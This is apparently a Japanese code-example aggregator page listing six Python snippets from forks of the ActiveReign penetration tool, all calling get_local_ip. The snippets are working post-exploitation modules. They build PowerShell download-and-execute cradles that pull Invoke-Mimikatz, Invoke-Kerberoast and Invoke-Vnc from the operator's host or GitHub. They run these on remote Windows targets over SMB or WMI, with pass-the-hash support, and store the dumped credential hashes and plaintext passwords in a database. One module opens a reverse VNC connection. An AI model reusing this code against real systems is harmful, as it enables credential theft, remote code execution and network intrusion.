Python get_local_ipの例、ar3.helpers.misc.get_local_ip Pythonの例

コード例 #1

0

ファイルを表示

ファイル: mimikatz.py プロジェクト: startagain2016/ActiveReign

    def run(self, target, args, smb_con, loggers, config_obj):
        logger  = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
        try:
            # Define Script Source
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 60)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
                setattr(args, 'timeout', timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output
                if not results:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                    return
                elif args.debug:
                    for line in results.splitlines():
                        loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
                        db_updates += 1

                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                        db_updates += 1
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])

                # write results to file
                file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])

            except Exception as e:
                if str(e) == "list index out of range":
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
                else:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

コード例 #2

0

ファイルを表示

ファイル: invoke_vnc.py プロジェクト: theralfbrown/ActiveReign

    def run(self, target, args, smb_con, loggers, config_obj):
        cmd = ''
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
        try:
            # Define Script Source
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            if self.args['CONTYPE']['Value'] == 'reverse':
                if not self.args['IPADDRESS']['Value']:
                    self.args['IPADDRESS']['Value'] = get_local_ip()

                cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])

            elif self.args['CONTYPE']['Value'] == 'bind':
                cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])

            else:
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
                exit(1)

            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            # Display Output
            if not x.startswith('Code execution failed'):
                for line in x.splitlines():
                    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
            else:
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

コード例 #3

0

ファイルを表示

    def run(self, target, args, smb_con, loggers, config_obj):
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([
            smb_con.host, smb_con.ip,
            self.name.upper(), 'Attempting Invoke-Kerberoast'
        ])
        try:
            # Define Script Source
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
                    srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            launcher = powershell.gen_ps_iex_cradle(script_location, '')

            # Execute
            cmd = powershell.create_ps_command(launcher,
                                               loggers['console'],
                                               force_ps32=args.force_ps32,
                                               no_obfs=args.no_obfs,
                                               server_os=smb_con.os)
            x = code_execution(smb_con,
                               args,
                               target,
                               loggers,
                               config_obj,
                               cmd,
                               return_data=True)

            # Display Output
            for line in x.splitlines():
                loggers['console'].success(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), line])

            # write results to file
            file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(x)
            loggers['console'].info([
                smb_con.host, smb_con.ip,
                self.name.upper(), "Output saved to: {}".format(file_name)
            ])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

コード例 #4

0

ファイルを表示

    def run(self, target, args, smb_con, loggers, config_obj):
        logger = loggers['console']
        try:
            # Get script:
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            logger.debug('Fetching script from {}'.format(script_location))

            # Setup
            timeout = args.timeout
            setattr(args, 'timeout', timeout+10)       # Modify timeout to allow execution time
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
                x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)
                # Display Output
                for line in x.splitlines():
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                db_updates = 0
                for cred in self.parse_mimikatz(x):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        db_updates += 1

                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        db_updates += 1
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
            except Exception as e:
                loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

コード例 #5

0

ファイルを表示

ファイル: wmiexec.py プロジェクト: rajivraj/ActiveReign

    def __init__(self, logger, host, args, smb_con, share_name=''):
        self.outfile    = gen_random_string()
        self.debug      = args.debug
        self.logger     = logger
        self.host       = host
        self.domain     = args.domain
        self.username   = args.user
        self.password   = args.passwd

        self.hash   = args.hash
        self.lmhash = ''
        self.nthash = ''


        self.pwd          = str('C:\\')
        self.shell        = 'cmd.exe /Q /c '
        self.noOutput     = args.no_output
        self.outputBuffer = ''

        self.timeout         = args.timeout
        self.smbcon          = smb_con
        self.fileless_output = False

        if share_name:
            # Fileless output
            self.fileless_output = True
            self.ip              = get_local_ip()
            self.share           = share_name
            self.path            = "\\"
        else:
            # Filed or Remote output
            self.ip     = args.exec_ip
            self.share  = args.exec_share
            self.path   = args.exec_path

        if self.hash:
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except:
                self.nthash = self.hash

コード例 #6

0

ファイルを表示

ファイル: smbexec.py プロジェクト: wizard2773/ActiveReign

    def __init__(self, logger, host, args, smb_con, port=445, share_name=''):

        self.logger = logger
        self.outfile = gen_random_string()
        self.batchFile = gen_random_string() + '.bat'
        self.__serviceName = gen_random_string()
        self.__rpctransport = None
        self.__scmr = None
        self.__conn = None
        self.__output = None
        self.__shell = '%COMSPEC% /Q /c '
        # self.__mode       = mode
        # self.__aesKey     = aesKey
        # self.__doKerberos = doKerberos

        # Auth
        self.smbcon = smb_con
        self.host = host
        self.port = port
        self.username = args.user
        self.password = args.passwd
        self.domain = args.domain
        self.hash = args.hash
        self.lmhash = ''
        self.nthash = ''
        self.timeout = args.timeout

        self.debug = args.debug
        self.noOutput = args.no_output
        self.fileless_output = False

        if share_name:
            # Fileless output
            self.fileless_output = True
            self.ip = get_local_ip()
            self.share = share_name
            self.path = "\\"
        else:
            # Filed or Remote output
            self.ip = args.exec_ip
            self.share = args.exec_share
            self.path = args.exec_path

        if self.hash:
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except:
                self.nthash = self.hash

        stringbinding = 'ncacn_np:{}[\pipe\svcctl]'.format(self.host)
        self.logger.debug('StringBinding {}'.format(stringbinding))
        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
        self.__rpctransport.set_dport(self.port)

        if hasattr(self.__rpctransport, 'setRemoteHost'):
            self.__rpctransport.setRemoteHost(self.host)
        if hasattr(self.__rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            self.__rpctransport.set_credentials(self.username, self.password,
                                                self.domain, self.lmhash,
                                                self.nthash)
        #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)

        self.__scmr = self.__rpctransport.get_dce_rpc()
        self.__scmr.connect()
        s = self.__rpctransport.get_smb_connection()
        # We don't wanna deal with timeouts from now on.
        s.setTimeout(self.timeout)

        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr)
        self.__scHandle = resp['lpScHandle']